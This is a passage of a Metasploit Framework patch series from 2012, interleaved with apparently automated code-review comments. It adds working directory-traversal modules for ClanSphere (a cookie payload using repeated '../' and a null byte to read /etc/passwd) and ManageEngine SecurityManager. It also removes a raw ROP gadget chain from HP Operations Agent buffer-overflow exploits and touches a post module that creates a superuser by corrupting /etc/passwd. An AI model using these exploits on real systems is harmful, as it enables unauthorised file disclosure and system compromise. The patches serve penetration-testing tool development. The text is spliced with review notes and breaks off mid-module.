@@ class Client req << set_chunked_header() req << set_raw_headers(c_rawh) req << set_body(pstr) - req end @@ -365,7 +361,7 @@ class Client # # Read a response from the server # - def read_response(t = -1) + def read_response(t = -1, opts = {}) resp = Response.new resp.max_data = config['read_max_data'] @@ -392,7 +388,7 @@ class Client ########################################################################## # XXX: NOTE: BUG: get_once currently (as of r10042) rescues "Exception" - # As such, the following rescue block will ever be reached. -jjd + # As such, the following rescue block will never be reached. -jjd ########################################################################## # Handle unexpected disconnects 
@@ -434,14 +430,20 @@ class Client return resp if not resp # As a last minute hack, we check to see if we're dealing with a 100 Continue here. - if resp.proto == '1.1' and resp.code == 100 - # If so, our real response becaome the body, so we re-parse it. - body = resp.body - resp = Response.new - resp.max_data = config['read_max_data'] - rv = resp.parse(body) - # XXX: At some point, this may benefit from processing post-completion code - # as seen above. + # Most of the time this is handled by the parser via check_100() + if resp.proto == '1.1' and resp.code == 100 and not opts[:skip_100] + # Read the real response from the body if we found one + # If so, our real response became the body, so we re-parse it. + if resp.body.to_s =~ /^HTTP/ + body = resp.body + resp = Response.new + resp.max_data = config['read_max_data'] + rv = resp.parse(body) + # We found a 100 Continue but didn't read the real reply yet + # Otherwise reread the reply, but don't try this hack again + else + resp = read_response(t, :skip_100 => true) + end end resp diff --git a/lib/rex/proto/http/packet.rb b/lib/rex/proto/http/packet.rb index d814523745..cd46e4ea45 100644 --- a/lib/rex/proto/http/packet.rb +++ b/lib/rex/proto/http/packet.rb @@ -367,6 +367,7 @@ protected if (self.body_bytes_left == 0) self.bufq.sub!(/^\r?\n/s,'') self.state = ParseState::Completed + self.check_100 return end @@ -396,10 +397,15 @@ protected # ready to go. if (not self.transfer_chunked and self.body_bytes_left == 0) self.state = ParseState::Completed + self.check_100 return end end + # Override this as needed + def check_100 + end + end end diff --git a/lib/rex/proto/http/response.rb b/lib/rex/proto/http/response.rb index 1d7414e310..0bdf36f061 100644 --- a/lib/rex/proto/http/response.rb +++ b/lib/rex/proto/http/response.rb @@ -53,6 +53,9 @@ class Response < Packet # default chunk sizes (if chunked is used) self.chunk_min_size = 1 self.chunk_max_size = 10 + + # 100 continue counter + self.count_100 = 0 end # 
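Review bot: In `read_response` (lib/rex/proto/http/client.rb) the new test `resp.body.to_s =~ /^HTTP/` uses `^`, which in Ruby matches at the start of any line, so a 100 Continue whose body merely contains a line beginning with `HTTP` is re-parsed as if it were the final response. Anchor the match to the start of the string with `resp.body.to_s =~ /\AHTTP/` (or `/\A\s*HTTP/` if a leading CRLF can remain in the body). The fallback `read_response(t, :skip_100 => true)` appears to reuse the full timeout `t` for the second read, so a caller may wait about twice as long as requested; the timeout handling lies outside this hunk, so that needs confirming. The method starts and ends outside the hunk.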
@@ -66,6 +69,19 @@ class Response < Packet else raise RuntimeError, "Invalid response command string", caller end + + check_100() + end + + # + # Allow 100 Continues to be ignored by the caller + # + def check_100 + # If this was a 100 continue with no data, reset + if self.code == 100 and (self.body_bytes_left == -1 or self.body_bytes_left == 0) and self.count_100 < 5 + self.reset_except_queue + self.count_100 += 1 + end end # @@ -84,6 +100,7 @@ class Response < Packet attr_accessor :code attr_accessor :message attr_accessor :proto + attr_accessor :count_100 end end From adc9532ec70fae9e436e888226ce195a07e75eb3 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 28 Oct 2012 23:13:32 -0500 Subject: [PATCH 14/64] Reset this back to master's copy, fixes this pull --- lib/rex/proto/http/client.rb | 62 +++++++++++++++++++----------------- 1 file changed, 33 insertions(+), 29 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 4d35a010b4..0572ea02ff 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -195,7 +195,8 @@ class Client # - cookie: Cookie header value # - ctype: Content-Type header value, default: +application/x-www-form-urlencoded+ # - data: HTTP data (only useful with some methods, see rfc2616) - # - encode: URI encode the supplied URI + # - encode: URI encode the supplied URI, default: false + # - encode_params: URI encode the GET or POST variables (names and values), default: true # - headers: HTTP headers as a hash, e.g. { "X-MyHeader" => "value" } # - method: HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET # - proto: protocol, default: HTTP 
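Review bot: The bound `self.count_100 < 5` in `check_100` (lib/rex/proto/http/response.rb) is an unexplained literal, although it is the only thing that stops a server from keeping the client resetting on interim responses indefinitely. Name it as a constant and add a comment such as `# Give up skipping interim 100 Continue responses after this many, so a hostile or broken server cannot stall the parser` next to it, stating that the 100 response is handed back to the caller once the limit is reached.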
@@ -208,28 +209,28 @@ class Client # - vhost: Host header value # def request_cgi(opts={}) - c_enc = opts['encode'] || false - c_cgi = opts['uri'] || '/' - c_body = opts['data'] || '' - c_meth = opts['method'] || 'GET' - c_prot = opts['proto'] || 'HTTP' - c_vers = opts['version'] || config['version'] || '1.1' - c_qs = opts['query'] || '' - c_varg = opts['vars_get'] || {} - c_varp = opts['vars_post'] || {} - c_head = opts['headers'] || config['headers'] || {} - c_rawh = opts['raw_headers']|| config['raw_headers'] || '' - c_type = opts['ctype'] || 'application/x-www-form-urlencoded' - c_ag = opts['agent'] || config['agent'] - c_cook = opts['cookie'] || config['cookie'] - c_host = opts['vhost'] || config['vhost'] - c_conn = opts['connection'] - c_path = opts['path_info'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - - uri = set_cgi(c_cgi) - qstr = c_qs - pstr = c_body + c_enc = opts['encode'] || false + c_enc_p = (opts['encode_params'] == true or opts['encode_params'].nil? ? true : false) + c_cgi = opts['uri'] || '/' + c_body = opts['data'] || '' + c_meth = opts['method'] || 'GET' + c_prot = opts['proto'] || 'HTTP' + c_vers = opts['version'] || config['version'] || '1.1' + c_qs = opts['query'] || '' + c_varg = opts['vars_get'] || {} + c_varp = opts['vars_post'] || {} + c_head = opts['headers'] || config['headers'] || {} + c_rawh = opts['raw_headers'] || config['raw_headers'] || '' + c_type = opts['ctype'] || 'application/x-www-form-urlencoded' + c_ag = opts['agent'] || config['agent'] + c_cook = opts['cookie'] || config['cookie'] + c_host = opts['vhost'] || config['vhost'] + c_conn = opts['connection'] + c_path = opts['path_info'] + c_auth = opts['basic_auth'] || config['basic_auth'] || '' + uri = set_cgi(c_cgi) + qstr = c_qs + pstr = c_body if (config['pad_get_params']) 1.upto(config['pad_get_params_count'].to_i) do |i| 
@@ -242,25 +243,27 @@ class Client c_varg.each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << set_encode_uri(var) + qstr << (c_enc_p ? set_encode_uri(var) : var) qstr << '=' - qstr << set_encode_uri(val) + qstr << (c_enc_p ? set_encode_uri(val) : val) end if (config['pad_post_params']) 1.upto(config['pad_post_params_count'].to_i) do |i| + rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) + rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) pstr << '&' if pstr.length > 0 - pstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) + pstr << (c_enc_p ? set_encode_uri(rand_var) : rand_var) pstr << '=' - pstr << set_encode_uri(Rex::Text.rand_text_alphanumeric(rand(32)+1)) + pstr << (c_enc_p ? set_encode_uri(rand_val) : rand_val) end end c_varp.each_pair do |var,val| pstr << '&' if pstr.length > 0 - pstr << set_encode_uri(var) + pstr << (c_enc_p ? set_encode_uri(var) : var) pstr << '=' - pstr << set_encode_uri(val) + pstr << (c_enc_p ? set_encode_uri(val) : val) end req = '' @@ -294,6 +297,7 @@ class Client req << set_chunked_header() req << set_raw_headers(c_rawh) req << set_body(pstr) + req end From 34731c3e0a103806a7ddba9e6cf1234bcfb68db5 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 29 Oct 2012 03:44:22 -0500 Subject: [PATCH 15/64] Add OSVDB-86720 - Clansphere dir traversarl --- .../scanner/http/clansphere_traversal.rb | 84 +++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 modules/auxiliary/scanner/http/clansphere_traversal.rb diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb new file mode 100644 index 0000000000..186ef60177 --- /dev/null +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb 
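Review bot: The non-encoding fallbacks such as `qstr << (c_enc_p ? set_encode_uri(val) : val)` pass the caller's value straight to `String#<<`, which appends an Integer as the single character with that codepoint and raises TypeError for nil. A caller passing `'vars_get' => { 'id' => 1 }` would therefore send a corrupted parameter on this path; what `set_encode_uri` does with non-strings is not visible here. Converting in the fallback, `qstr << (c_enc_p ? set_encode_uri(val) : val.to_s)`, and likewise for `var` and the two `pstr` lines in the `c_varp` loop, makes both branches always append text. These loops sit inside request_cgi, which starts and ends outside the hunk.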
@@ -0,0 +1,84 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ClanSphere 2011.3 Local File Inclusion Vulnerability', + 'Description' => %q{ + This module exploits a directory traversal flaw found in Clansphere 2011.3. + The application fails to handle the cs_lang parameter properly, which can be + used to read any file outside the virtual directory. + }, + 'References' => + [ + ['OSVDB', '86720'], + ['EDB', '22181'] + ], + 'Author' => + [ + 'blkhtc0rp', #Original + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Oct 23 2012" + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path to the web application', '/clansphere_2011.3/']), + OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']), + OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10]) + ], self.class) + end + + + def run_host(ip) + base = target_uri.path + base << '/' if base[-1,1] != '/' + + peer = "#{ip}:#{rport}" + + print_status("#{peer} - Reading '#{datastore['FILE']}'") + traverse = "../" * datastore['DEPTH'] + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}index.php", + 'cookie' => "blah=blah; cs_lang=#{traverse}#{datastore['FILE']}%00.png" + }) + + if res and res.body =~ /^Fatal error\:/ + print_error("Either '#{datastore['FILE']}' does not exist, or no permission.") + + elsif res and res.code == 200 + pattern_end = " UTC +1 - Load:" + data = res.body.scan(/\
\n(.+)\n\x20{5}UTC.+/m).flatten[0].lstrip + fname = datastore['FILE'] + p = store_loot( + 'clansphere.cms', + 'application/octet-stream', + ip, + data, + fname + ) + + vprint_line(data) + print_good("#{peer} - #{fname} stored as '#{p}'") + + else + print_error("#{peer} - Fail to obtain file for some unknown reason") + end + end + +end From 2c4273e4780b1bcede21a631e2916e09bca96849 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 29 Oct 2012 04:41:30 -0500 Subject: [PATCH 16/64] Correct some modules with res nil --- modules/auxiliary/admin/officescan/tmlisten_traversal.rb | 5 +++++ modules/auxiliary/dos/http/sonicwall_ssl_format.rb | 2 +- modules/auxiliary/scanner/http/ektron_cms400net.rb | 2 +- .../auxiliary/scanner/http/sap_businessobjects_user_brute.rb | 4 ++-- .../scanner/http/sap_businessobjects_user_brute_web.rb | 2 +- .../auxiliary/scanner/http/sap_businessobjects_user_enum.rb | 4 ++-- modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb | 2 ++ modules/exploits/unix/webapp/dogfood_spell_exec.rb | 2 +- 8 files changed, 15 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index 46da0d97fd..edc05e66b0 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -51,6 +51,11 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', }, 20) + if not res + print_error("No response from server") + return + end + http_fingerprint({ :response => res }) if (res.code >= 200) diff --git a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb index 49d141a235..7cbe47c42a 100644 --- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb +++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb 
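Review bot: In the `res.code == 200` branch of `run_host` in clansphere_traversal.rb, the `scan(...).flatten[0].lstrip` chain assumes the pattern always matches. When a 200 page does not have the expected layout, `flatten[0]` is nil and the host's run ends in NoMethodError rather than a reported failure. Assign the `flatten[0]` result to `data` first and add `return print_error("#{peer} - Unexpected response format") if data.nil?` before calling `lstrip`. The local `pattern_end` is assigned and never read, so it can be removed. The `Fatal error` message is the only output in the method without the `#{peer} - ` prefix.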
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => datastore['URI'] + fmt, }) - if res.code == 200 + if res and res.code == 200 res.body.scan(/\(.+)XX/ism) print_status("Information leaked: #{$1}") end diff --git a/modules/auxiliary/scanner/http/ektron_cms400net.rb b/modules/auxiliary/scanner/http/ektron_cms400net.rb index 9ed7d41267..4f9c0c22d1 100644 --- a/modules/auxiliary/scanner/http/ektron_cms400net.rb +++ b/modules/auxiliary/scanner/http/ektron_cms400net.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary #Check for HTTP 200 response. #Numerous versions and configs make if difficult to further fingerprint. - if (res.code == 200) + if (res and res.code == 200) print_status("Ektron CMS400.NET install found at #{target_url} [HTTP 200]") #Gather __VIEWSTATE and __EVENTVALIDATION from HTTP response. diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index 51accf67d5..526adfc1c5 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -89,8 +89,8 @@ class Metasploit3 < Msf::Auxiliary 'Content-Type' => 'text/xml; charset=UTF-8', } }, 45) - return :abort if (res.code == 404) - success = true if(res.body.match(/SessionInfo/i)) + return :abort if (!res or (res and res.code == 404)) + success = true if(res and res.body.match(/SessionInfo/i)) success rescue ::Rex::ConnectionError diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb index e7c35ce747..37a9d4e42b 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb 
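Review bot: The guard added in sap_businessobjects_user_brute.rb, `return :abort if (!res or (res and res.code == 404))`, tests `res` twice, and the next line's `res and` re-tests it after the early return has already excluded nil. `return :abort if res.nil? || res.code == 404` is equivalent, and the `success` line can then drop its `res and`. The same doubled test is added in sap_businessobjects_user_brute_web.rb, and in sap_businessobjects_user_enum.rb it lands inside an existing `if res` block where the `!res` arm can never be true. Returning `:abort` for a missing response also makes a timeout indistinguishable from a 404, so a `vprint_error` before the return would help. All three methods extend beyond their hunks.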
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary 'Accept-Encoding' => "gzip,deflate", }, }, 45) - return :abort if (res.code != 200) + return :abort if (!res or (res and res.code != 200)) if(res.body.match(/Account Information/i)) success = false else diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index 3d97d8c46f..93bbc821c5 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -93,8 +93,8 @@ class Metasploit3 < Msf::Auxiliary }, 45) if res - return :abort if (res.code == 404) - success = true if(res.body.match(/Invalid password/i)) + return :abort if (!res or (res and res.code == 404)) + success = true if(res and res.body.match(/Invalid password/i)) success else vprint_error("[SAP BusinessObjects] No response") diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index d3972a086c..25fd8950e2 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -126,6 +126,8 @@ class Metasploit4 < Msf::Auxiliary } }, 45) + return if not res + if (res.code != 500 and res.code != 200) return else diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index 1f0d91ae35..abe79ede7d 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => datastore['URIPATH'], }, 1) - if (res.body =~ /Spell Check complete/) + if (res and res.body =~ /Spell Check complete/) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe From ac90d217259bc3aeb91e4029b126a2b268c67230 Mon Sep 17 00:00:00 2001 
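Review bot: The `return if not res` added in sap_mgmt_con_brute_login.rb exits without any output, so a host that never answered looks the same in the log as a rejected credential. The tmlisten_traversal.rb hunk in this same commit prints `No response from server` before returning, and this one should match it: `unless res` / `print_error("No response from server")` / `return`. The surrounding method starts and ends outside the hunk, so whether a caller relies on the bare nil return value could not be checked from here.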
From: Tod Beardsley Date: Mon, 29 Oct 2012 08:27:22 -0500 Subject: [PATCH 17/64] Msftidy checks for file loads --- tools/msftidy.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index cdcf95aea8..505fb15855 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -208,6 +208,11 @@ class Msftidy end end + # if ln =~/^[ \t]+load[ \t]+.*?\.rb/ + if ln =~/^[ \t]*load[ \t]+[\x22\x27]/ + error("Loading (not requiring) a file: #{ln.inspect}", idx) + end + # The rest of these only count if it's not a comment line next if ln =~ /[[:space:]]*#/ From bd0352de1993b339ad9c6aeccf730ed5817c773a Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 08:33:01 -0500 Subject: [PATCH 18/64] Delete comment --- tools/msftidy.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 505fb15855..e630ea2c8b 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -208,7 +208,6 @@ class Msftidy end end - # if ln =~/^[ \t]+load[ \t]+.*?\.rb/ if ln =~/^[ \t]*load[ \t]+[\x22\x27]/ error("Loading (not requiring) a file: #{ln.inspect}", idx) end From 0e3bc7d060d405766274ef30ba77bac223fc4b72 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 29 Oct 2012 15:45:40 +0100 Subject: [PATCH 19/64] hp operations agent mods: fix use of pattern_create, use ropdb --- .../misc/hp_operations_agent_coda_34.rb | 36 +++---------------- .../misc/hp_operations_agent_coda_8c.rb | 36 +++---------------- 2 files changed, 10 insertions(+), 62 deletions(-) diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index f87c4615e9..b0bbfffef4 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb 
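Review bot: The new check `ln =~/^[ \t]*load[ \t]+[\x22\x27]/` requires whitespace between `load` and the opening quote, so the parenthesised form `load('lib/foo.rb')` and `Kernel.load "..."` go unflagged. Widening it to `ln =~ /^[ \t]*(?:Kernel\.)?load[ \t]*\(?[ \t]*[\x22\x27]/` covers those spellings and still does not match identifiers such as `load_plugin`. A one-line comment above the check explaining why `load` is rejected (it re-executes the file on every call instead of using `require`'s once-only bookkeeping) would help module authors who hit the error. The enclosing method starts and ends outside the hunk.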
@@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh + include Msf::Exploit::RopDb def initialize super( @@ -182,37 +183,10 @@ user-agent: BBC 11.00.044; 14 bof << payload.encoded bof << rand_text(4000) # Allows to trigger exception else # Windows 2003 - rop_gadgets = - [ - 0x77bb2563, # POP EAX # RETN - 0x77ba1114, # <- *&VirtualProtect() - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77bb0c86, # XCHG EAX,ESI # RETN - 0x77bc9801, # POP EBP # RETN - 0x77be2265, # ptr to 'push esp # ret' - 0x77bb2563, # POP EAX # RETN - 0x03C0990F, - 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) - 0x77bb48d3, # POP EBX, RET - 0x77bf21e0, # .data - 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN - 0x77bbfc02, # POP ECX # RETN - 0x77bef001, # W pointer (lpOldProtect) (-> ecx) - 0x77bd8c04, # POP EDI # RETN - 0x77bd8c05, # ROP NOP (-> edi) - 0x77bb2563, # POP EAX # RETN - 0x03c0984f, - 0x77bdd441, # SUB EAX, 03c0940f - 0x77bb8285, # XCHG EAX,EDX # RETN - 0x77bb2563, # POP EAX # RETN - nop, - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN - ].pack("V*") - bof = Rex::Text.pattern_create(target['RopOffset']) - bof << rop_gadgets - bof << payload.encoded - my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length + rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'2003'}) + bof = rand_text(target['RopOffset']) + bof << rop_payload + my_payload_length = target['RopOffset'] + rop_payload.length bof << rand_text(target['Offset'] - my_payload_length) bof << generate_seh_record(target.ret) bof << rand_text(4000) # Allows to trigger exception diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index 152836b2e4..23160eb4e0 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb 
+++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh + include Msf::Exploit::RopDb def initialize super( @@ -182,37 +183,10 @@ user-agent: BBC 11.00.044; 14 bof << payload.encoded bof << rand_text(4000) # Allows to trigger exception else # Windows 2003 - rop_gadgets = - [ - 0x77bb2563, # POP EAX # RETN - 0x77ba1114, # <- *&VirtualProtect() - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77bb0c86, # XCHG EAX,ESI # RETN - 0x77bc9801, # POP EBP # RETN - 0x77be2265, # ptr to 'push esp # ret' - 0x77bb2563, # POP EAX # RETN - 0x03C0990F, - 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) - 0x77bb48d3, # POP EBX, RET - 0x77bf21e0, # .data - 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN - 0x77bbfc02, # POP ECX # RETN - 0x77bef001, # W pointer (lpOldProtect) (-> ecx) - 0x77bd8c04, # POP EDI # RETN - 0x77bd8c05, # ROP NOP (-> edi) - 0x77bb2563, # POP EAX # RETN - 0x03c0984f, - 0x77bdd441, # SUB EAX, 03c0940f - 0x77bb8285, # XCHG EAX,EDX # RETN - 0x77bb2563, # POP EAX # RETN - nop, - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN - ].pack("V*") - bof = Rex::Text.pattern_create(target['RopOffset']) - bof << rop_gadgets - bof << payload.encoded - my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length + rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'2003'}) + bof = rand_text(target['RopOffset']) + bof << rop_payload + my_payload_length = target['RopOffset'] + rop_payload.length bof << rand_text(target['Offset'] - my_payload_length) bof << generate_seh_record(target.ret) bof << rand_text(4000) # Allows to trigger exception From 5e80e19a4ec59f26f8d0c2c963a665b9b8d2e2f5 Mon Sep 17 00:00:00 2001 
From: Tod Beardsley Date: Mon, 29 Oct 2012 11:08:03 -0500 Subject: [PATCH 20/64] Msftidy complaint about EOL spaces --- modules/post/multi/escalate/metasploit_pcaplog.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 64cdea7f19..3ce5ff4189 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Post 'References' => [ [ 'BID', '54472' ], - [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'], + [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'], [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ], ], 'DisclosureDate' => "Jul 16 2012", @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post } )) register_options( - [ + [ Opt::RPORT(2940), OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]), OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]), 
@@ -98,13 +98,13 @@ class Metasploit3 < Msf::Post i = (i+1) % 60 # increment second counter end - if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") + if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") # TODO: Consider recording our now-created username and password as a valid credential here. else - print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added") - end + print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added") + end # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload - # However beceause the session is not a terminal, su will not always allow this. + # However beceause the session is not a terminal, su will not always allow this. end end From 65e27ff38a614459b31fcacd7540c26aa06ec5da Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 29 Oct 2012 11:22:06 -0500 Subject: [PATCH 21/64] Warn about the potential to jack up /etc/passwd This needs to be underlined. It's too easy to wang up /etc/passwd by accident. This closes PR #632 [Fixes #38593685] --- modules/post/multi/escalate/metasploit_pcaplog.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 3ce5ff4189..0e02a311e8 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb 
@@ -33,7 +33,9 @@ class Metasploit3 < Msf::Post Successful exploitation results in the creation of a new superuser account. - This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd. + This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap + files and truncate /etc/passwd. Note that if this module fails, you can potentially induce + a permanent DoS on the target by corrupting the /etc/passwd file. }, 'License' => MSF_LICENSE, 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'], From 2a202e9035b771cf8b07ad41f36209bd1e54b3d6 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 29 Oct 2012 12:23:48 -0500 Subject: [PATCH 22/64] Add OSVDB-86563 ManageEngine SecurityManager dir traversal --- .../manageengine_securitymanager_traversal.rb | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb new file mode 100644 index 0000000000..b716be0c79 --- /dev/null +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb 
@@ -0,0 +1,92 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ManageEngine SecurityManager Plus 5.5 Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal flaw found in ManageEngine + SecurityManager Plus 5.5 or less. When handling a file download request, + the DownloadServlet class fails to properly check the 'f' parameter, which + can be abused to read any file outside the virtual directory. + }, + 'References' => + [ + ['OSVDB', '86563'], + ['EDB', '22092'] + ], + 'Author' => + [ + 'blkhtc0rp', #Original + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Oct 19 2012" + )) + + register_options( + [ + OptPort.new('RPORT', [true, 'The target port', 6262]), + OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']), + OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']), + OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10]) + ], self.class) + end + + + def run_host(ip) + base = target_uri.path + base << '/' if base[-1,1] != '/' + + peer = "#{ip}:#{rport}" + fname = datastore['FILE'] + + print_status("#{peer} - Reading '#{datastore['FILE']}'") + traverse = "../" * datastore['DEPTH'] + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}store", + 'vars_get' => { + 'f' => "#{traverse}#{datastore['FILE']}" + } + }) + + + if res and res.code == 500 and res.body =~ /Error report/ + print_error("Cannot obtain '#{fname}', here are some possible reasons:") + print_error("\t1. 
